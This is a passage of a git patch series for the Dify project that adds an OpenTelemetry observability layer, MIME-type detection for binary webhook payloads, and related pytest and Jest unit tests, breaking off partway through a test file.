_hydrate_node_data(self, data: Mapping[str, Any]) -> NodeDataT: return cast(NodeDataT, self._node_data_type.model_validate(data)) @@ -256,14 +265,12 @@ class Node(Generic[NodeDataT]): raise NotImplementedError def run(self) -> Generator[GraphNodeEventBase, None, None]: - # Generate a single node execution ID to use for all events - if not self._node_execution_id: - self._node_execution_id = str(uuid4()) + execution_id = self.ensure_execution_id() self._start_at = naive_utc_now() # Create and push start event with required fields start_event = NodeRunStartedEvent( - id=self._node_execution_id, + id=execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.title, @@ -321,7 +328,7 @@ class Node(Generic[NodeDataT]): if isinstance(event, NodeEventBase): # pyright: ignore[reportUnnecessaryIsInstance] yield self._dispatch(event) elif isinstance(event, GraphNodeEventBase) and not event.in_iteration_id and not event.in_loop_id: # pyright: ignore[reportUnnecessaryIsInstance] - event.id = self._node_execution_id + event.id = self.execution_id yield event else: yield event @@ -333,7 +340,7 @@ class Node(Generic[NodeDataT]): error_type="WorkflowNodeError", ) yield NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -512,7 +519,7 @@ class Node(Generic[NodeDataT]): match result.status: case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -521,7 +528,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self.id, node_type=self.node_type, start_at=self._start_at, @@ -537,7 +544,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: StreamChunkEvent) -> NodeRunStreamChunkEvent: return NodeRunStreamChunkEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, selector=event.selector, @@ -550,7 +557,7 @@ class Node(Generic[NodeDataT]): match event.node_run_result.status: case WorkflowNodeExecutionStatus.SUCCEEDED: return NodeRunSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -558,7 +565,7 @@ class Node(Generic[NodeDataT]): ) case WorkflowNodeExecutionStatus.FAILED: return NodeRunFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, start_at=self._start_at, @@ -573,7 +580,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: PauseRequestedEvent) -> NodeRunPauseRequestedEvent: return NodeRunPauseRequestedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_run_result=NodeRunResult(status=WorkflowNodeExecutionStatus.PAUSED), @@ -583,7 +590,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: AgentLogEvent) -> NodeRunAgentLogEvent: return NodeRunAgentLogEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, message_id=event.message_id, @@ -599,7 +606,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopStartedEvent) -> NodeRunLoopStartedEvent: return NodeRunLoopStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -612,7 +619,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopNextEvent) -> NodeRunLoopNextEvent: return NodeRunLoopNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -623,7 +630,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopSucceededEvent) -> NodeRunLoopSucceededEvent: return NodeRunLoopSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -637,7 +644,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: LoopFailedEvent) -> NodeRunLoopFailedEvent: return NodeRunLoopFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -652,7 +659,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationStartedEvent) -> NodeRunIterationStartedEvent: return NodeRunIterationStartedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -665,7 +672,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationNextEvent) -> NodeRunIterationNextEvent: return NodeRunIterationNextEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -676,7 +683,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationSucceededEvent) -> NodeRunIterationSucceededEvent: return NodeRunIterationSucceededEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -690,7 +697,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: IterationFailedEvent) -> NodeRunIterationFailedEvent: return NodeRunIterationFailedEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, node_title=self.node_data.title, @@ -705,7 +712,7 @@ class Node(Generic[NodeDataT]): @_dispatch.register def _(self, event: RunRetrieverResourceEvent) -> NodeRunRetrieverResourceEvent: return NodeRunRetrieverResourceEvent( - id=self._node_execution_id, + id=self.execution_id, node_id=self._node_id, node_type=self.node_type, retriever_resources=event.retriever_resources, diff --git a/api/core/workflow/workflow_entry.py b/api/core/workflow/workflow_entry.py index d4ec29518a..ddf545bb34 100644 --- a/api/core/workflow/workflow_entry.py +++ b/api/core/workflow/workflow_entry.py @@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError from core.workflow.graph import Graph from core.workflow.graph_engine import GraphEngine from core.workflow.graph_engine.command_channels import InMemoryChannel -from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer +from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent from core.workflow.nodes import NodeType @@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING from core.workflow.runtime import GraphRuntimeState, VariablePool from core.workflow.system_variable import SystemVariable from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool +from extensions.otel.runtime import is_instrument_flag_enabled from factories import file_factory from models.enums import UserFrom from models.workflow import Workflow @@ -98,6 +99,10 @@ class WorkflowEntry: ) self.graph_engine.layer(limits_layer) + # Add observability layer when OTel is enabled + if dify_config.ENABLE_OTEL or is_instrument_flag_enabled(): + self.graph_engine.layer(ObservabilityLayer()) + def run(self) -> Generator[GraphEngineEvent, None, None]: graph_engine = self.graph_engine diff --git a/api/extensions/otel/decorators/base.py b/api/extensions/otel/decorators/base.py index 9604a3b6d5..14221d24dd 100644 --- a/api/extensions/otel/decorators/base.py +++ b/api/extensions/otel/decorators/base.py @@ -1,5 +1,4 @@ import functools -import os from collections.abc import Callable from typing import Any, TypeVar, cast @@ -7,22 +6,13 @@ from opentelemetry.trace import get_tracer from configs import dify_config from extensions.otel.decorators.handler import SpanHandler +from extensions.otel.runtime import is_instrument_flag_enabled T = TypeVar("T", bound=Callable[..., Any]) _HANDLER_INSTANCES: dict[type[SpanHandler], SpanHandler] = {SpanHandler: SpanHandler()} -def _is_instrument_flag_enabled() -> bool: - """ - Check if external instrumentation is enabled via environment variable. - - Third-party non-invasive instrumentation agents set this flag to coordinate - with Dify's manual OpenTelemetry instrumentation. - """ - return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" - - def _get_handler_instance(handler_class: type[SpanHandler]) -> SpanHandler: """Get or create a singleton instance of the handler class.""" if handler_class not in _HANDLER_INSTANCES: @@ -43,7 +33,7 @@ def trace_span(handler_class: type[SpanHandler] | None = None) -> Callable[[T], def decorator(func: T) -> T: @functools.wraps(func) def wrapper(*args: Any, **kwargs: Any) -> Any: - if not (dify_config.ENABLE_OTEL or _is_instrument_flag_enabled()): + if not (dify_config.ENABLE_OTEL or is_instrument_flag_enabled()): return func(*args, **kwargs) handler = _get_handler_instance(handler_class or SpanHandler) diff --git a/api/extensions/otel/runtime.py b/api/extensions/otel/runtime.py index 16f5ccf488..a7181d2683 100644 --- a/api/extensions/otel/runtime.py +++ b/api/extensions/otel/runtime.py @@ -1,4 +1,5 @@ import logging +import os import sys from typing import Union @@ -71,3 +72,13 @@ def init_celery_worker(*args, **kwargs): if dify_config.DEBUG: logger.info("Initializing OpenTelemetry for Celery worker") CeleryInstrumentor(tracer_provider=tracer_provider, meter_provider=metric_provider).instrument() + + +def is_instrument_flag_enabled() -> bool: + """ + Check if external instrumentation is enabled via environment variable. + + Third-party non-invasive instrumentation agents set this flag to coordinate + with Dify's manual OpenTelemetry instrumentation. + """ + return os.getenv("ENABLE_OTEL_FOR_INSTRUMENT", "").strip().lower() == "true" diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py new file mode 100644 index 0000000000..b18a3369e9 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/conftest.py @@ -0,0 +1,101 @@ +""" +Shared fixtures for ObservabilityLayer tests. +""" + +from unittest.mock import MagicMock, patch + +import pytest +from opentelemetry.sdk.trace import TracerProvider +from opentelemetry.sdk.trace.export import SimpleSpanProcessor +from opentelemetry.sdk.trace.export.in_memory_span_exporter import InMemorySpanExporter +from opentelemetry.trace import set_tracer_provider + +from core.workflow.enums import NodeType + + +@pytest.fixture +def memory_span_exporter(): + """Provide an in-memory span exporter for testing.""" + return InMemorySpanExporter() + + +@pytest.fixture +def tracer_provider_with_memory_exporter(memory_span_exporter): + """Provide a TracerProvider configured with memory exporter.""" + import opentelemetry.trace as trace_api + + trace_api._TRACER_PROVIDER = None + trace_api._TRACER_PROVIDER_SET_ONCE._done = False + + provider = TracerProvider() + processor = SimpleSpanProcessor(memory_span_exporter) + provider.add_span_processor(processor) + set_tracer_provider(provider) + + yield provider + + provider.force_flush() + + +@pytest.fixture +def mock_start_node(): + """Create a mock Start Node.""" + node = MagicMock() + node.id = "test-start-node-id" + node.title = "Start Node" + node.execution_id = "test-start-execution-id" + node.node_type = NodeType.START + return node + + +@pytest.fixture +def mock_llm_node(): + """Create a mock LLM Node.""" + node = MagicMock() + node.id = "test-llm-node-id" + node.title = "LLM Node" + node.execution_id = "test-llm-execution-id" + node.node_type = NodeType.LLM + return node + + +@pytest.fixture +def mock_tool_node(): + """Create a mock Tool Node with tool-specific attributes.""" + from core.tools.entities.tool_entities import ToolProviderType + from core.workflow.nodes.tool.entities import ToolNodeData + + node = MagicMock() + node.id = "test-tool-node-id" + node.title = "Test Tool Node" + node.execution_id = "test-tool-execution-id" + node.node_type = NodeType.TOOL + + tool_data = ToolNodeData( + title="Test Tool Node", + desc=None, + provider_id="test-provider-id", + provider_type=ToolProviderType.BUILT_IN, + provider_name="test-provider", + tool_name="test-tool", + tool_label="Test Tool", + tool_configurations={}, + tool_parameters={}, + ) + node._node_data = tool_data + + return node + + +@pytest.fixture +def mock_is_instrument_flag_enabled_false(): + """Mock is_instrument_flag_enabled to return False.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=False): + yield + + +@pytest.fixture +def mock_is_instrument_flag_enabled_true(): + """Mock is_instrument_flag_enabled to return True.""" + with patch("core.workflow.graph_engine.layers.observability.is_instrument_flag_enabled", return_value=True): + yield diff --git a/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py new file mode 100644 index 0000000000..458cf2cc67 --- /dev/null +++ b/api/tests/unit_tests/core/workflow/graph_engine/layers/test_observability.py @@ -0,0 +1,219 @@ +""" +Tests for ObservabilityLayer. + +Test coverage: +- Initialization and enable/disable logic +- Node span lifecycle (start, end, error handling) +- Parser integration (default and tool-specific) +- Graph lifecycle management +- Disabled mode behavior +""" + +from unittest.mock import patch + +import pytest +from opentelemetry.trace import StatusCode + +from core.workflow.enums import NodeType +from core.workflow.graph_engine.layers.observability import ObservabilityLayer + + +class TestObservabilityLayerInitialization: + """Test ObservabilityLayer initialization logic.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_initialization_when_otel_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer initializes correctly when OTel is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_true") + def test_initialization_when_instrument_flag_enabled(self, tracer_provider_with_memory_exporter): + """Test that layer enables when instrument flag is enabled.""" + layer = ObservabilityLayer() + assert not layer._is_disabled + assert layer._tracer is not None + assert NodeType.TOOL in layer._parsers + assert layer._default_parser is not None + + +class TestObservabilityLayerNodeSpanLifecycle: + """Test node span creation and lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_span_created_and_ended( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that span is created on node start and ended on node end.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].name == mock_llm_node.title + assert spans[0].status.status_code == StatusCode.OK + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_error_recorded_in_span( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that node execution errors are recorded in span.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + error = ValueError("Test error") + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, error) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + assert spans[0].status.status_code == StatusCode.ERROR + assert len(spans[0].events) > 0 + assert any("exception" in event.name.lower() for event in spans[0].events) + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_node_end_without_start_handled_gracefully( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that ending a node without start doesn't crash.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + +class TestObservabilityLayerParserIntegration: + """Test parser integration for different node types.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_default_parser_used_for_regular_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_start_node + ): + """Test that default parser is used for non-tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_start_node.id + assert attrs["node.execution_id"] == mock_start_node.execution_id + assert attrs["node.type"] == mock_start_node.node_type.value + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_tool_parser_used_for_tool_node( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_tool_node + ): + """Test that tool parser is used for tool nodes.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_tool_node) + layer.on_node_run_end(mock_tool_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + attrs = spans[0].attributes + assert attrs["node.id"] == mock_tool_node.id + assert attrs["tool.provider.id"] == mock_tool_node._node_data.provider_id + assert attrs["tool.provider.type"] == mock_tool_node._node_data.provider_type.value + assert attrs["tool.name"] == mock_tool_node._node_data.tool_name + + +class TestObservabilityLayerGraphLifecycle: + """Test graph lifecycle management.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_start_clears_contexts(self, tracer_provider_with_memory_exporter, mock_llm_node): + """Test that on_graph_start clears node contexts.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_start() + assert len(layer._node_contexts) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_no_unfinished_spans( + self, tracer_provider_with_memory_exporter, memory_span_exporter, mock_llm_node + ): + """Test that on_graph_end handles normal completion.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + layer.on_node_run_end(mock_llm_node, None) + layer.on_graph_end(None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 1 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", True) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_on_graph_end_with_unfinished_spans_logs_warning( + self, tracer_provider_with_memory_exporter, mock_llm_node, caplog + ): + """Test that on_graph_end logs warning for unfinished spans.""" + layer = ObservabilityLayer() + layer.on_graph_start() + + layer.on_node_run_start(mock_llm_node) + assert len(layer._node_contexts) == 1 + + layer.on_graph_end(None) + + assert len(layer._node_contexts) == 0 + assert "node spans were not properly ended" in caplog.text + + +class TestObservabilityLayerDisabledMode: + """Test behavior when layer is disabled.""" + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_start(self, memory_span_exporter, mock_start_node): + """Test that disabled layer doesn't create spans on node start.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_graph_start() + layer.on_node_run_start(mock_start_node) + layer.on_node_run_end(mock_start_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 + + @patch("core.workflow.graph_engine.layers.observability.dify_config.ENABLE_OTEL", False) + @pytest.mark.usefixtures("mock_is_instrument_flag_enabled_false") + def test_disabled_mode_skips_node_end(self, memory_span_exporter, mock_llm_node): + """Test that disabled layer doesn't process node end.""" + layer = ObservabilityLayer() + assert layer._is_disabled + + layer.on_node_run_end(mock_llm_node, None) + + spans = memory_span_exporter.get_finished_spans() + assert len(spans) == 0 From 7695f9151c67fa52a2bebcbd788bf7d5bd875051 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E9=9D=9E=E6=B3=95=E6=93=8D=E4=BD=9C?= Date: Tue, 16 Dec 2025 13:34:27 +0800 Subject: [PATCH 21/27] chore: webhook with bin file should guess mimetype (#29704) Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com> Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com> Co-authored-by: autofix-ci[bot] <114827586+autofix-ci[bot]@users.noreply.github.com> Co-authored-by: Maries --- api/services/trigger/webhook_service.py | 20 +++++- .../services/test_webhook_service.py | 64 +++++++++++++++++++ 2 files changed, 83 insertions(+), 1 deletion(-) diff --git a/api/services/trigger/webhook_service.py b/api/services/trigger/webhook_service.py index 4b3e1330fd..5c4607d400 100644 --- a/api/services/trigger/webhook_service.py +++ b/api/services/trigger/webhook_service.py @@ -33,6 +33,11 @@ from services.errors.app import QuotaExceededError from services.trigger.app_trigger_service import AppTriggerService from services.workflow.entities import WebhookTriggerData +try: + import magic +except ImportError: + magic = None # type: ignore[assignment] + logger = logging.getLogger(__name__) @@ -317,7 +322,8 @@ class WebhookService: try: file_content = request.get_data() if file_content: - file_obj = cls._create_file_from_binary(file_content, "application/octet-stream", webhook_trigger) + mimetype = cls._detect_binary_mimetype(file_content) + file_obj = cls._create_file_from_binary(file_content, mimetype, webhook_trigger) return {"raw": file_obj.to_dict()}, {} else: return {"raw": None}, {} @@ -341,6 +347,18 @@ class WebhookService: body = {"raw": ""} return body, {} + @staticmethod + def _detect_binary_mimetype(file_content: bytes) -> str: + """Guess MIME type for binary payloads using python-magic when available.""" + if magic is not None: + try: + detected = magic.from_buffer(file_content[:1024], mime=True) + if detected: + return detected + except Exception: + logger.debug("python-magic detection failed for octet-stream payload") + return "application/octet-stream" + @classmethod def _process_file_uploads( cls, files: Mapping[str, FileStorage], webhook_trigger: WorkflowWebhookTrigger diff --git a/api/tests/unit_tests/services/test_webhook_service.py b/api/tests/unit_tests/services/test_webhook_service.py index 920b1e91b6..d788657589 100644 --- a/api/tests/unit_tests/services/test_webhook_service.py +++ b/api/tests/unit_tests/services/test_webhook_service.py @@ -110,6 +110,70 @@ class TestWebhookServiceUnit: assert webhook_data["method"] == "POST" assert webhook_data["body"]["raw"] == "raw text content" + def test_extract_octet_stream_body_uses_detected_mime(self): + """Octet-stream uploads should rely on detected MIME type.""" + app = Flask(__name__) + binary_content = b"plain text data" + + with app.test_request_context( + "/webhook", method="POST", headers={"Content-Type": "application/octet-stream"}, data=binary_content + ): + webhook_trigger = MagicMock() + mock_file = MagicMock() + mock_file.to_dict.return_value = {"file": "data"} + + with ( + patch.object(WebhookService, "_detect_binary_mimetype", return_value="text/plain") as mock_detect, + patch.object(WebhookService, "_create_file_from_binary") as mock_create, + ): + mock_create.return_value = mock_file + body, files = WebhookService._extract_octet_stream_body(webhook_trigger) + + assert body["raw"] == {"file": "data"} + assert files == {} + mock_detect.assert_called_once_with(binary_content) + mock_create.assert_called_once() + args = mock_create.call_args[0] + assert args[0] == binary_content + assert args[1] == "text/plain" + assert args[2] is webhook_trigger + + def test_detect_binary_mimetype_uses_magic(self, monkeypatch): + """python-magic output should be used when available.""" + fake_magic = MagicMock() + fake_magic.from_buffer.return_value = "image/png" + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "image/png" + fake_magic.from_buffer.assert_called_once() + + def test_detect_binary_mimetype_fallback_without_magic(self, monkeypatch): + """Fallback MIME type should be used when python-magic is unavailable.""" + monkeypatch.setattr("services.trigger.webhook_service.magic", None) + + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + + def test_detect_binary_mimetype_handles_magic_exception(self, monkeypatch): + """Fallback MIME type should be used when python-magic raises an exception.""" + try: + import magic as real_magic + except ImportError: + pytest.skip("python-magic is not installed") + + fake_magic = MagicMock() + fake_magic.from_buffer.side_effect = real_magic.MagicException("magic error") + monkeypatch.setattr("services.trigger.webhook_service.magic", fake_magic) + + with patch("services.trigger.webhook_service.logger") as mock_logger: + result = WebhookService._detect_binary_mimetype(b"binary data") + + assert result == "application/octet-stream" + mock_logger.debug.assert_called_once() + def test_extract_webhook_data_invalid_json(self): """Test webhook data extraction with invalid JSON.""" app = Flask(__name__) From 4553e4c12f9852d430259f2a76f3e029e6f44755 Mon Sep 17 00:00:00 2001 From: yyh <92089059+lyzno1@users.noreply.github.com> Date: Tue, 16 Dec 2025 14:18:09 +0800 Subject: [PATCH 22/27] test: add comprehensive Jest tests for CustomPage and WorkflowOnboardingModal components (#29714) --- .../custom/custom-page/index.spec.tsx | 500 +++++++++++++ .../common/document-picker/index.spec.tsx | 7 - .../preview-document-picker.spec.tsx | 2 +- .../retrieval-method-config/index.spec.tsx | 7 - .../workflow-onboarding-modal/index.spec.tsx | 686 ++++++++++++++++++ .../start-node-option.spec.tsx | 348 +++++++++ .../start-node-selection-panel.spec.tsx | 586 +++++++++++++++ 7 files changed, 2121 insertions(+), 15 deletions(-) create mode 100644 web/app/components/custom/custom-page/index.spec.tsx create mode 100644 web/app/components/workflow-app/components/workflow-onboarding-modal/index.spec.tsx create mode 100644 web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-option.spec.tsx create mode 100644 web/app/components/workflow-app/components/workflow-onboarding-modal/start-node-selection-panel.spec.tsx diff --git a/web/app/components/custom/custom-page/index.spec.tsx b/web/app/components/custom/custom-page/index.spec.tsx new file mode 100644 index 0000000000..f260236587 --- /dev/null +++ b/web/app/components/custom/custom-page/index.spec.tsx @@ -0,0 +1,500 @@ +import React from 'react' +import { render, screen } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import CustomPage from './index' +import { Plan } from '@/app/components/billing/type' +import { createMockProviderContextValue } from '@/__mocks__/provider-context' +import { contactSalesUrl } from '@/app/components/billing/config' + +// Mock external dependencies only +jest.mock('@/context/provider-context', () => ({ + useProviderContext: jest.fn(), +})) + +jest.mock('@/context/modal-context', () => ({ + useModalContext: jest.fn(), +})) + +// Mock the complex CustomWebAppBrand component to avoid dependency issues +// This is acceptable because it has complex dependencies (fetch, APIs) +jest.mock('../custom-web-app-brand', () => ({ + __esModule: true, + default: () =>
CustomWebAppBrand
, +})) + +// Get the mocked functions +const { useProviderContext } = jest.requireMock('@/context/provider-context') +const { useModalContext } = jest.requireMock('@/context/modal-context') + +describe('CustomPage', () => { + const mockSetShowPricingModal = jest.fn() + + beforeEach(() => { + jest.clearAllMocks() + + // Default mock setup + useModalContext.mockReturnValue({ + setShowPricingModal: mockSetShowPricingModal, + }) + }) + + // Helper function to render with different provider contexts + const renderWithContext = (overrides = {}) => { + useProviderContext.mockReturnValue( + createMockProviderContextValue(overrides), + ) + return render() + } + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange & Act + renderWithContext() + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + + it('should always render CustomWebAppBrand component', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByTestId('custom-web-app-brand')).toBeInTheDocument() + }) + + it('should have correct layout structure', () => { + // Arrange & Act + const { container } = renderWithContext() + + // Assert + const mainContainer = container.querySelector('.flex.flex-col') + expect(mainContainer).toBeInTheDocument() + }) + }) + + // Conditional Rendering - Billing Tip + describe('Billing Tip Banner', () => { + it('should show billing tip when enableBilling is true and plan is sandbox', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.getByText('custom.upgradeTip.title')).toBeInTheDocument() + expect(screen.getByText('custom.upgradeTip.des')).toBeInTheDocument() + expect(screen.getByText('billing.upgradeBtn.encourageShort')).toBeInTheDocument() + }) + + it('should not show billing tip when enableBilling is false', () => { + // Arrange & Act + renderWithContext({ + enableBilling: false, + plan: { type: Plan.sandbox }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.upgradeTip.des')).not.toBeInTheDocument() + }) + + it('should not show billing tip when plan is professional', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.upgradeTip.des')).not.toBeInTheDocument() + }) + + it('should not show billing tip when plan is team', () => { + // Arrange & Act + renderWithContext({ + enableBilling: true, + plan: { type: Plan.team }, + }) + + // Assert + expect(screen.queryByText('custom.upgradeTip.title')).not.toBeInTheDocument() + expect(screen.queryByText('custom.upgradeTip.des')).not.toBeInTheDocument() + }) + + it('should have correct gradient styling for billing tip banner', () => { + // Arrange & Act + const { container } = renderWithContext({ + enableBilling: true, + plan: { type: Plan.sandbox }, + }) + + // Assert + const banner = container.querySelector('.bg-gradient-to-r') + expect(banner).toBeInTheDocument() + expect(banner).toHaveClass('from-components-input-border-active-prompt-1') + expect(banner).toHaveClass('to-components-input-border-active-prompt-2') + expect(banner).toHaveClass('p-4') + expect(banner).toHaveClass('pl-6') + expect(banner).toHaveClass('shadow-lg') + }) + }) + + // Conditional Rendering - Contact Sales + describe('Contact Sales Section', () => { + it('should show contact section when enableBilling is true and plan is professional', () => { + // Arrange & Act + const { container } = renderWithContext({ + enableBilling: true, + plan: { type: Plan.professional }, + }) + + // Assert - Check that contact section exists with all parts + const contactSection = container.querySelector('.absolute.bottom-0') + expect(contactSection).toBeInTheDocument() + expect(contactSection).toHaveTextContent('custom.customize.prefix') + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + expect(contactSection).toHaveTextContent('custom.customize.suffix') + }) + + it('should show contact section when enableBilling is true and plan is team', () => { + // Arrange & Act + const { container } = renderWithContext({ + enableBilling: true, + plan: { type: Plan.team }, + }) + + // Assert - Check that contact section exists with all parts + const contactSection = container.querySelector('.absolute.bottom-0') + expect(contactSection).toBeInTheDocument() + expect(contactSection).toHaveTextContent('custom.customize.prefix') + expect(screen.getByText('custom.customize.contactUs')).toBeInTheDocument() + 